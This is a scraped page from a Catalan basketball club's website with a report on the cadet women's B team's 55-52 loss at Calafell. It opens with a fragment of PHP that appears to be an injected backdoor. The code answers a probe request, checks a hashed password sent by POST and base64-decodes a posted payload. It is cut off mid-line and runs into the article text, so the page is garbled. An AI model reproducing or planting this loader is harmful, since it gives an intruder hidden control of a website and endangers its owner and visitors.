function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El mal primer quart i les faltes tomben el cadet femení B (55-52) - Tgn Bàsquet Club -

El mal primer quart i les faltes tomben el cadet femení B (55-52)

Updated: novembre 18, 2013

El cadet femení B del TGN Bàsquet va perdre a Calafell en un partit que va exhibir el millor i el pitjor de l’equip que entrena Jordi Crespo. El conjunt lila va sortir massa nerviós a la pista i això ho va aprofitar el Calafell per fer un parcial de 17-4 en els primers deu minuts. El TGN Bàsquet, però, va refer-se en el segon període i, jugant els millors minuts de la temporada, va ser capaç de capgirar la dinàmica a còpia d’intensitat i convicció en la victòria que es va transformar en una gran defensa que va deixar el resultat al descans en empat a 27.

Al tercer període les faltes personals van decidir. La visitant Beltrán, que estava fent una gran defensa, va ser eliminada per cinc faltes i l’equip ho va pagar encaixant un parcial de 10-2 als últims tres minuts del període. El Calafell havia carregat el joc interior i això obligava les visitants a multiplicar-se en defensa. El TGN Bàsquet, lluny de deixar-se anar, va continuar lluitant, defensant amb ungles i dents i anotant en contraatac fins que Comadó (clau en la remuntada visitant amb 3 pilores recuperades de forma consecutiva), al quart període, va ser castigada amb una antiesportiva i eliminada per cinc faltes. El partit estava igualat i, amb 51-52 i poc més d’un minut per acabar el matx, el Calafell va tenir més sang freda i va decidir des de la línea de tirs lliures (4/6).